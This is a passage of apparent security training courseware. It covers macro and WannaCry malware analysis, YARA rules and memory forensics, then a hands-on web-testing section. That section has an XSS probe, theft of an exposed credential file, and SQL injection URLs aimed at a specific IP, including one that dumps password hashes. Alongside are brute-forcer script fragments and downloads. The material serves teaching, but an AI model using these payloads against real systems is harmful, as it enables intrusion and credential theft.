    print "\nError: Check your wordlist path\n"
    sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
    brute(word.replace("\n",""))
  1464.  
  1465.  
  1466.  
  1467.  
  1468. References you might find helpful:
  1469. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
  1470.  
  1471.  
  1472.  
  1473.  
  1474.  
  1475.  
  1476.  
  1477.  
  1478.  
  1479. wget https://s3.amazonaws.com/infosecaddictsfiles/md5crack.py
  1480.  
  1481. vi md5crack.py
  1482.  
  1483.  
  1484.  
  1485.  
  1486.  
  1487.  
  1488. Why use hexdigest
  1489. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
  1490.  
  1491.  
  1492.  
  1493.  
  1494. http://md5online.net/
  1495.  
  1496.  
  1497.  
  1498.  
  1499.  
  1500.  
  1501.  
  1502. wget https://s3.amazonaws.com/infosecaddictsfiles/wpbruteforcer.py
  1503.  
  1504.  
  1505.  
  1506.  
  1507. #############################
  1508. # Reference Videos To Watch #
  1509. #############################
Here is your fourth set of youtube videos that I'd like for you to watch:
  1511. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
  1512.  
  1513.  
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519.  
  1520. ###############################
  1521. # Lesson 28: Malware Analysis #
  1522. ###############################
  1523.  
  1524.  
  1525.  
  1526.  
  1527. ################
  1528. # The Scenario #
  1529. ################
  1530. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  1531.  
  1532.  
  1533. The fastest thing you can do is perform static analysis.
  1534.  
  1535. sudo pip install olefile
  1536. infosecaddicts
  1537.  
  1538. mkdir ~/Desktop/oledump
  1539.  
  1540. cd ~/Desktop/oledump
  1541.  
  1542. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1543.  
  1544. unzip oledump_V0_0_22.zip
  1545.  
  1546. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  1547.  
  1548. unzip 064016.zip
  1549. infected
  1550.  
  1551. python oledump.py 064016.doc
  1552.  
  1553. python oledump.py 064016.doc -s A4 -v
  1554.  
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
  1557.  
  1558.  
  1559. python oledump.py 064016.doc -s A5 -v
  1560.  
  1561. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1562.  
  1563.  
  1564. python oledump.py 064016.doc -s A3 -v
  1565.  
  1566. - Look for "GVhkjbjv" and you should see:
  1567.  

  1569.  
  1570. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1571. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
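
The same hex-to-ASCII step can be done offline instead of pasting the blob into a website. This is an added example written for Python 3 (not part of the original courseware or of oledump): the macro text and its hex payload are constructed, only the variable name GVhkjbjv comes from the lab, and the helper names are made up for illustration.

```python
import binascii
import re

# Constructed stand-in for macro source as printed by "oledump.py -s A3 -v".
# The payload is made up for this example and decodes to a harmless echo
# command; like the lab's blob it starts with 636D and ends with 653B.
SAMPLE_MACRO = '''
Sub AutoOpen()
    GVhkjbjv = "636D642E657865202F63206563686F20" & _
               "636F6E73747275637465642073616D706C653B"
    x = "4A6F65"
End Sub
'''

# VBA joins string pieces with & or +, optionally continued on the next line
# with a trailing underscore. Macro authors use this to break up long blobs.
_JOIN = re.compile(r'"\s*[&+]\s*(?:_\s*)?"')

# A quoted literal made only of hex digit pairs.
_HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2})+)"')


def join_vba_strings(source):
    """Collapse "aa" & "bb" (including line continuations) into "aabb"."""
    return _JOIN.sub("", source)


def find_hex_blobs(source, min_bytes=16):
    """Return hex literals that encode at least min_bytes bytes.

    The length filter drops short literals that merely look like hex.
    """
    joined = join_vba_strings(source)
    return [m.group(1) for m in _HEX_LITERAL.finditer(joined)
            if len(m.group(1)) >= 2 * min_bytes]


def decode_blob(blob):
    """Hex-decode a blob; non-printable bytes are shown as '.'."""
    raw = binascii.unhexlify(blob)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def decode_macro(source, min_bytes=16):
    """Decode every long hex blob found in the macro source."""
    return [decode_blob(b) for b in find_hex_blobs(source, min_bytes)]


if __name__ == "__main__":
    for text in decode_macro(SAMPLE_MACRO):
        print(text)
```

To use it on the lab file, save the output of the oledump command to a text file and pass its contents to decode_macro().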
  1572.  
  1573.  
  1574.  
  1575. ###################
  1576. # Static Analysis #
  1577. ###################
  1578.  
  1579. - After logging please open a terminal window and type the following commands:
  1580.  
  1581. cd Desktop/
  1582.  
  1583. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  1584.  
  1585. unzip wannacry.zip
  1586. infected
  1587.  
  1588. file wannacry.exe
  1589.  
  1590. mv wannacry.exe malware.pdf
  1591.  
  1592. file malware.pdf
  1593.  
  1594. mv malware.pdf wannacry.exe
  1595.  
  1596. hexdump -n 2 -C wannacry.exe
  1597.  
  1598.  
  1599.  
  1600.  
  1601. ***What is '4d 5a' or 'MZ'***
  1602. Reference:
  1603. http://www.garykessler.net/library/file_sigs.html
  1604.  
  1605.  
  1606.  
  1607.  
  1608.  
  1609. objdump -x wannacry.exe
  1610.  
  1611. strings wannacry.exe
  1612.  
  1613. strings --all wannacry.exe | head -n 6
  1614.  
  1615. strings wannacry.exe | grep -i dll
  1616.  
  1617. strings wannacry.exe | grep -i library
  1618.  
  1619. strings wannacry.exe | grep -i reg
  1620.  
  1621. strings wannacry.exe | grep -i key
  1622.  
  1623. strings wannacry.exe | grep -i rsa
  1624.  
  1625. strings wannacry.exe | grep -i open
  1626.  
  1627. strings wannacry.exe | grep -i get
  1628.  
  1629. strings wannacry.exe | grep -i mutex
  1630.  
  1631. strings wannacry.exe | grep -i irc
  1632.  
  1633. strings wannacry.exe | grep -i join
  1634.  
  1635. strings wannacry.exe | grep -i admin
  1636.  
  1637. strings wannacry.exe | grep -i list
  1638.  
  1639.  
  1640.  
  1641.  
  1642.  
  1643.  
  1644.  
  1645.  
  1646.  
  1647.  
  1648.  
  1649. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  1650.  
Quick Google search for "wannacry ransomware analysis"
  1652.  
  1653.  
  1654. Reference
  1655. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1656.  
  1657. - Yara Rule -
  1658.  
  1659.  
Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  1667.  
  1668.  
  1669.  
  1670.  
  1671.  
  1672.  
  1673.  
  1674.  
  1675. Ok, let's look for the individual strings
  1676.  
  1677.  
  1678.  
  1679. strings wannacry.exe | grep -i ooops
  1680.  
  1681. strings wannacry.exe | grep -i wanna
  1682.  
  1683. strings wannacry.exe | grep -i wcry
  1684.  
  1685. strings wannacry.exe | grep -i wannacry
  1686.  
  1687. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  1688.  
  1689.  
  1690.  
  1691.  
  1692.  
  1693.  
  1694.  
  1695. ####################################
  1696. # Tired of GREP - let's try Python #
  1697. ####################################
  1698. Decided to make my own script for this kind of stuff in the future. I
  1699.  
  1700. Reference1:
  1701. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  1702.  
  1703. This is a really good script for the basics of static analysis
  1704.  
  1705. Reference:
  1706. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  1707.  
  1708.  
  1709. This is really good for showing some good signatures to add to the Python script
  1710.  
  1711.  
  1712. Here is my own script using the signatures (started this yesterday, but still needs work):
  1713. https://pastebin.com/guxzCBmP
  1714.  
  1715.  
  1716.  
  1717.  
  1718. sudo apt install -y python-pefile
  1719. infosecaddicts
  1720.  
  1721.  
  1722.  
  1723. wget https://pastebin.com/raw/guxzCBmP
  1724.  
  1725.  
  1726. mv guxzCBmP am.py
  1727.  
  1728.  
  1729. vi am.py
  1730.  
  1731. python am.py wannacry.exe
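
A sketch of the kind of check such a script performs, added here as an example written for Python 3 (it is not am.py or analyse_malware.py). It verifies the 'MZ' magic and searches for the signature strings listed above in both ASCII and UTF-16LE ("wide") form, case-insensitively, which plain strings | grep does not do for wide strings. The sample buffer and the function names are constructed for illustration.

```python
import re

# Signature strings copied from the Yara rule quoted on this page
# (the rule has no $s6, so none appears here either).
SIGNATURES = {
    "$s1": "Ooops, your files have been encrypted!",
    "$s2": "Wanna Decryptor",
    "$s3": ".wcry",
    "$s4": "WANNACRY",
    "$s5": "WANACRY!",
    "$s7": "icacls . /grant Everyone:F /T /C /Q",
}

# Constructed sample: an MZ header stub, one signature in lower-case ASCII
# and one stored as UTF-16LE, the way Windows resources usually hold text.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + b"wanacry!"
    + b"\x00" * 4
    + "Wanna Decryptor".encode("utf-16-le")
)


def has_mz_magic(data):
    """True when the buffer starts with '4d 5a' ('MZ'), the DOS/PE magic."""
    return data[:2] == b"MZ"


def ascii_strings(data, min_len=4):
    """Printable-ASCII runs, roughly what plain `strings` prints by default."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def _pattern(text, wide):
    """Case-insensitive byte regex for text as ASCII or UTF-16LE."""
    raw = text.encode("utf-16-le") if wide else text.encode("ascii")
    return re.compile(re.escape(raw), re.IGNORECASE)


def scan(data):
    """Return {rule_id: [(encoding, offset), ...]} for every signature hit."""
    hits = {}
    for rule_id, text in SIGNATURES.items():
        for label, wide in (("ascii", False), ("wide", True)):
            for match in _pattern(text, wide).finditer(data):
                hits.setdefault(rule_id, []).append((label, match.start()))
    return hits


def scan_file(path):
    """Read a file from disk and scan it; returns (is_mz, hits)."""
    with open(path, "rb") as handle:
        data = handle.read()
    return has_mz_magic(data), scan(data)


if __name__ == "__main__":
    print("MZ header:", has_mz_magic(SAMPLE))
    print("ASCII strings:", ascii_strings(SAMPLE))
    for rule_id, found in sorted(scan(SAMPLE).items()):
        print(rule_id, SIGNATURES[rule_id], found)
```

On the constructed sample, ascii_strings() only returns the ASCII hit, while scan() also reports the wide "Wanna Decryptor" string.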
  1732.  
  1733.  
  1734.  
  1735.  
  1736.  
  1737.  
  1738.  
  1739.  
  1740.  
  1741.  
  1742. ##############
  1743. # Yara Ninja #
  1744. ##############
  1745. cd ~/Desktop
  1746.  
  1747. sudo apt-get remove -y yara
infosecaddicts
  1749.  
  1750. sudo apt -y install libtool
  1751. infosecaddicts
  1752.  
  1753. wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
  1754.  
  1755.  
  1756. unzip v3.6.0.zip
  1757.  
  1758. cd yara-3.6.0
  1759.  
  1760. ./bootstrap.sh
  1761.  
  1762. ./configure
  1763.  
  1764. make
  1765.  
  1766. sudo make install
  1767. infosecaddicts
  1768.  
  1769. yara -v
  1770.  
  1771. cd ~/Desktop
  1772.  
  1773.  
  1774.  
  1775.  
  1776. NOTE:
  1777. McAfee is giving these yara rules - so add them to the hashes.txt file
  1778.  
  1779. Reference:
  1780. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  1781.  
  1782. ----------------------------------------------------------------------------
  1783. rule wannacry_1 : ransom
  1784. {
  1785. meta:
  1786. author = "Joshua Cannell"
  1787. description = "WannaCry Ransomware strings"
  1788. weight = 100
  1789. date = "2017-05-12"
  1790.  
  1791. strings:
  1792. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  1793. $s2 = "Wanna Decryptor" wide ascii nocase
  1794. $s3 = ".wcry" wide ascii nocase
  1795. $s4 = "WANNACRY" wide ascii nocase
  1796. $s5 = "WANACRY!" wide ascii nocase
  1797. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  1798.  
  1799. condition:
  1800. any of them
  1801. }
  1802.  
  1803. ----------------------------------------------------------------------------
  1804. rule wannacry_2{
  1805. meta:
  1806. author = "Harold Ogden"
  1807. description = "WannaCry Ransomware Strings"
  1808. date = "2017-05-12"
  1809. weight = 100
  1810.  
  1811. strings:
  1812. $string1 = "msg/m_bulgarian.wnry"
  1813. $string2 = "msg/m_chinese (simplified).wnry"
  1814. $string3 = "msg/m_chinese (traditional).wnry"
  1815. $string4 = "msg/m_croatian.wnry"
  1816. $string5 = "msg/m_czech.wnry"
  1817. $string6 = "msg/m_danish.wnry"
  1818. $string7 = "msg/m_dutch.wnry"
  1819. $string8 = "msg/m_english.wnry"
  1820. $string9 = "msg/m_filipino.wnry"
  1821. $string10 = "msg/m_finnish.wnry"
  1822. $string11 = "msg/m_french.wnry"
  1823. $string12 = "msg/m_german.wnry"
  1824. $string13 = "msg/m_greek.wnry"
  1825. $string14 = "msg/m_indonesian.wnry"
  1826. $string15 = "msg/m_italian.wnry"
  1827. $string16 = "msg/m_japanese.wnry"
  1828. $string17 = "msg/m_korean.wnry"
  1829. $string18 = "msg/m_latvian.wnry"
  1830. $string19 = "msg/m_norwegian.wnry"
  1831. $string20 = "msg/m_polish.wnry"
  1832. $string21 = "msg/m_portuguese.wnry"
  1833. $string22 = "msg/m_romanian.wnry"
  1834. $string23 = "msg/m_russian.wnry"
  1835. $string24 = "msg/m_slovak.wnry"
  1836. $string25 = "msg/m_spanish.wnry"
  1837. $string26 = "msg/m_swedish.wnry"
  1838. $string27 = "msg/m_turkish.wnry"
  1839. $string28 = "msg/m_vietnamese.wnry"
  1840.  
  1841.  
  1842. condition:
  1843. any of ($string*)
  1844. }
  1845. ----------------------------------------------------------------------------
  1846.  
  1847.  
  1848. #######################
  1849. # External DB Lookups #
  1850. #######################
  1851.  
  1852. Creating a malware database (sqlite)
  1853. ------------------------------------
  1854. sudo apt install -y python-simplejson python-simplejson-dbg
  1855. infosecaddicts
  1856.  
  1857.  
  1858.  
  1859. wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
  1860.  
  1861.  
  1862.  
  1863. python avsubmit.py -f wannacry.exe -e
  1864.  
  1865.  
  1866. Analysis of the file can be found at:
  1867. http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875.  
  1876.  
  1877. ###############################
  1878. # Creating a Malware Database #
  1879. ###############################
  1880. Creating a malware database (mysql)
  1881. -----------------------------------
  1882. - Step 1: Installing MySQL database
  1883. - Run the following command in the terminal:
  1884.  
  1885. sudo apt install -y mysql-server
  1886. infosecaddicts
  1887.  
  1888. - Step 2: Installing Python MySQLdb module
  1889. - Run the following command in the terminal:
  1890.  
  1891. sudo apt-get build-dep python-mysqldb
  1892. infosecaddicts
  1893.  
  1894. sudo apt install -y python-mysqldb
  1895. infosecaddicts
  1896.  
  1897. Step 3: Logging in
  1898. Run the following command in the terminal:
  1899.  
  1900. mysql -u root -p (set a password of 'malware')
  1901.  
  1902. - Then create one database by running following command:
  1903.  
  1904. create database malware;
  1905.  
  1906. exit;
  1907.  
  1908. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1909.  
  1910. vi mal_to_db.py (fill in database connection information)
  1911.  
  1912. python mal_to_db.py -i
  1913.  
  1914. ------- check it to see if the files table was created ------
  1915.  
  1916. mysql -u root -p
  1917. malware
  1918.  
  1919. show databases;
  1920.  
  1921. use malware;
  1922.  
  1923. show tables;
  1924.  
  1925. describe files;
  1926.  
  1927. exit;
  1928.  
  1929. ---------------------------------
  1930.  
  1931.  
  1932. - Now add the malicious file to the DB
  1933.  
  1934. python mal_to_db.py -f wannacry.exe -u
  1935.  
  1936.  
  1937.  
  1938. - Now check to see if it is in the DB
  1939.  
  1940. mysql -u root -p
  1941. malware
  1942.  
  1943. mysql> use malware;
  1944.  
  1945. select id,md5,sha1,sha256,time FROM files;
  1946.  
  1947. mysql> quit;
  1948.  
  1949.  
  1950.  
  1951.  
  1952. ######################################
  1953. # PCAP Analysis with forensicPCAP.py #
  1954. ######################################
  1955. cd ~/Desktop
  1956. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1957. sudo easy_install cmd2
  1958.  
  1959. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  1960.  
  1961. ForPCAP >>> help
  1962.  
  1963.  
  1964. Prints stats about PCAP
  1965. ForPCAP >>> stat
  1966.  
  1967.  
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id, which can be used with the "show" command.
  1969. ForPCAP >>> dns
  1970.  
  1971. ForPCAP >>> show
  1972.  
  1973.  
Prints all destination ports from the PCAP file. The id before the DNS is the packet's id, which can be used with the "show" command.
  1975. ForPCAP >>> dstports
  1976.  
  1977. ForPCAP >>> show
  1978.  
  1979.  
Prints the number of source IPs and stores them.
  1981. ForPCAP >>> ipsrc
  1982.  
  1983.  
Prints the number of web requests and stores them.
  1985. ForPCAP >>> web
  1986.  
  1987.  
Prints the number of mail requests and stores them.
  1989. ForPCAP >>> mail
  1990.  
  1991.  
  1992.  
  1993. ###################
  1994. # Memory Analysis #
  1995. ###################
  1996. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  1997.  
  1998. python volatility
  1999. python volatility pslist -f ../hn_forensics.vmem
  2000. python volatility connscan2 -f ../hn_forensics.vmem
  2001. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  2002. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  2003. ***Takes a few min***
  2004. strings 1752.dmp | grep "^http://" | sort | uniq
  2005. strings 1752.dmp | grep "Ahttps://" | uniq -u
  2006. cd ..
  2007. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  2008. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  2009. cat audit.txt
  2010. cd pdf
  2011. ls
  2012. grep -i javascript *.pdf
  2013.  
  2014.  
  2015.  
  2016. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  2017. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  2018. unzip pdf-parser_V0_6_4.zip
  2019. python pdf-parser.py -s javascript --raw 00600328.pdf
  2020. python pdf-parser.py --object 11 00600328.pdf
  2021. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  2022.  
  2023. cat malicious.js
  2024.  
  2025.  
  2026. *****Sorry - no time to cover javascript de-obfuscation today*****
  2027.  
  2028.  
  2029. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  2030. python volatility files -f ../hn_forensics.vmem > files
  2031. cat files | less
  2032. python volatility malfind -f ../hn_forensics.vmem -d out
  2033. ls out/
  2034. python volatility hivescan -f ../hn_forensics.vmem
  2035. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in *.dmp; do echo "$file"; strings "$file" | grep bankofamerica; done
  2037.  
  2038.  
  2039.  
  2040. Start with simple Firefox Addons:
  2041.  
  2042. - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
  2043. - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
  2044. - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  2045. - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Wappalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
  2047.  
  2048. A good list of web app testing add ons for Firefox:
  2049. https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
  2050.  
  2051.  
  2052.  
  2053.  
  2054.  
  2055.  
  2056.  
  2057. ##################################
  2058. # Basic: Web Application Testing #
  2059. ##################################
  2060.  
Most people are going to tell you to reference the OWASP Testing Guide.
  2062. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  2063.  
  2064. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  2065.  
  2066.  
  2067. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  2068.  
  2069. 1. Does the website talk to a DB?
  2070. - Look for parameter passing (ex: site.com/page.php?id=4)
  2071. - If yes - try SQL Injection
  2072.  
  2073. 2. Can I or someone else see what I type?
  2074. - If yes - try XSS
  2075.  
  2076. 3. Does the page reference a file?
  2077. - If yes - try LFI/RFI
  2078.  
  2079. Let's start with some manual testing against 54.245.184.121
  2080.  
  2081.  
  2082. Start here:
  2083. http://54.245.184.121/
  2084.  
  2085.  
  2086. There's no parameter passing on the home page so the answer to question 1 is NO.
  2087. There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
  2088.  
  2089. Try an XSS in the search box on the home page:
  2090. <script>alert(123);</script>
  2091.  
  2092. Doing this gives us the following in the address bar:
  2093. http://54.245.184.121/BasicSearch.aspx?Word=<script>alert(123);</script>
  2094.  
  2095. Ok, so we've verified that there is XSS in the search box.
  2096.  
  2097. Let's move on to the search box in the left of the page.
  2098.  
  2099. Let's give the newsletter signup box a shot
  2100.  
  2101. Moving on to the login page.
  2102. http://54.245.184.121/login.aspx
  2103.  
  2104. I entered a single quote (') for both the user name and the password. I got the following error:
  2105.  
  2106. -----------------------------------------------------------------
  2107. 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2108. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2109.  
  2110. Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
  2111.  
  2112. Source Error:
  2113.  
  2114.  
  2115. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2116. Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
  2117. Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
  2118. Line 115: //String test = xmln.ToString();
  2119. Line 116: if (xmln.Count > 0)
  2120.  
  2121. -----------------------------------------------------------------
  2122.  
  2123.  
  2124. Hmm....System.Xml.XPath.XPathException.....that's not SQL.
  2125.  
  2126. WTF is this:
  2127. Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
  2128.  
  2129.  
  2130.  
  2131.  
In this case you'll have to trap the request with a proxy like:
  2133. - Firefox Tamper Data
  2134. - Burp Suite http://www.portswigger.net/Burp/proxy.html
  2135. - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
  2136. - Rat Proxy https://code.google.com/p/ratproxy/
  2137. - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  2138. - Paros http://sourceforge.net/projects/paros/
  2139.  
  2140.  
  2141.  
  2142. Let's go back to that page error message.....
  2143.  
  2144.  
  2145. Let's check it out:
  2146. http://54.245.184.121/AuthInfo.xml
  2147.  
  2148. Looks like we found passwords!!!!!!!!!!
  2149.  
  2150.  
Looks like there is no significant new functionality after logging in with the stolen credentials.
  2152.  
  2153. Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
  2154.  
  2155.  
  2156. http://54.245.184.121/bookdetail.aspx?id=2
  2157.  
  2158.  
  2159. Ok, there is parameter passing (bookdetail.aspx?id=2).
  2160.  
  2161. The page name is: bookdetail.aspx
  2162. The parameter name is: id
The parameter value is: 2
  2164.  
  2165.  
  2166. Let's try throwing a single quote (') in there:
  2167.  
  2168. http://54.245.184.121/bookdetail.aspx?id=2'
  2169.  
  2170.  
  2171. I get the following error:
  2172.  
  2173. Unclosed quotation mark after the character string ''.
  2174. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  2175.  
  2176. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  2177.  
  2178.  
  2179.  
  2180.  
  2181.  
  2182.  
  2183.  
  2184.  
  2185.  
  2186.  
  2187. #########################################################################################
  2188. # SQL Injection #
  2189. # https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
  2190. #########################################################################################
  2191.  
  2192.  
- Another quick way to test for SQLI is to remove the parameter value
  2194.  
  2195.  
  2196. #############################
  2197. # Error-Based SQL Injection #
  2198. #############################
  2199. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  2200. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  2201. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  2202. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  2203. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  2204. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  2205. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  2206. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  2207. http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  2208.  
  2209.  
  2210.  
  2211.  
  2212. #############################
  2213. # Union-Based SQL Injection #
  2214. #############################
  2215. http://54.245.184.121/bookdetail.aspx?id=2 order by 100--
  2216. http://54.245.184.121/bookdetail.aspx?id=2 order by 50--
  2217. http://54.245.184.121/bookdetail.aspx?id=2 order by 25--
  2218. http://54.245.184.121/bookdetail.aspx?id=2 order by 10--
  2219. http://54.245.184.121/bookdetail.aspx?id=2 order by 5--
  2220. http://54.245.184.121/bookdetail.aspx?id=2 order by 6--
  2221. http://54.245.184.121/bookdetail.aspx?id=2 order by 7--
  2222. http://54.245.184.121/bookdetail.aspx?id=2 order by 8--
  2223. http://54.245.184.121/bookdetail.aspx?id=2 order by 9--
  2224. http://54.245.184.121/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  2225.  
  2226. We are using a union select statement because we are joining the developer's query with one of our own.
  2227. Reference:
  2228. http://www.techonthenet.com/sql/union.php
  2229. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  2230. It removes duplicate rows between the various SELECT statements.
  2231.  
  2232. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  2233.  
  2234. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  2235.  
Negating the parameter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  2237.  
  2238. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  2239. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  2240. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  2241. http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  2242.  
  2243.  
  2244.  
  2245.  
  2246.  
  2247. - Another way is to see if you can get the backend to perform an arithmetic function
  2248. http://54.245.184.121/bookdetail.aspx?id=(2)
  2249. http://54.245.184.121/bookdetail.aspx?id=(4-2)
  2250. http://54.245.184.121/bookdetail.aspx?id=(4-1)
  2251.  
  2252.  
  2253.  
  2254. http://54.245.184.121/bookdetail.aspx?id=2 or 1=1--
  2255. http://54.245.184.121/bookdetail.aspx?id=2 or 1=2--
  2256. http://54.245.184.121/bookdetail.aspx?id=1*1
  2257. http://54.245.184.121/bookdetail.aspx?id=2 or 1 >-1#
  2258. http://54.245.184.121/bookdetail.aspx?id=2 or 1<99#
  2259. http://54.245.184.121/bookdetail.aspx?id=2 or 1<>1#
  2260. http://54.245.184.121/bookdetail.aspx?id=2 or 2 != 3--
  2261. http://54.245.184.121/bookdetail.aspx?id=2 &0#
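
Why those probes behave the way they do, and what the fix looks like, as an added example written for Python 3 that is not code from the target application. An in-memory SQLite table stands in for the SQL Server backend, and the table, data and function names are assumptions.

```python
import re
import sqlite3

# Probe values taken from the URLs above (everything after "id=").
PROBES = ["2", "2'", "(4-2)", "(4-1)", "2 or 1=1--", "2 or 1=2--"]


def make_db():
    """In-memory stand-in for the book catalogue (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO books VALUES (?, ?)",
        [(1, "Book One"), (2, "Book Two"), (3, "Book Three")],
    )
    return db


def lookup_concatenated(db, raw_id):
    """Weak form: the request value becomes part of the SQL text."""
    sql = "SELECT title FROM books WHERE id = " + raw_id
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, raw_id):
    """Hardened form: validate the type, then bind the value.

    A bound value is handed to the database as data, so quotes, operators
    and comment markers in it are never parsed as SQL.
    """
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a small non-negative integer")
    sql = "SELECT title FROM books WHERE id = ?"
    return [row[0] for row in db.execute(sql, (int(raw_id),))]


def outcome(lookup, db, raw_id):
    """Run one lookup and summarise what the caller would observe."""
    try:
        return sorted(lookup(db, raw_id))
    except sqlite3.Error as exc:
        # This is the condition the verbose error page exposed.
        return "db error: " + type(exc).__name__
    except ValueError:
        return "rejected"


def compare(db):
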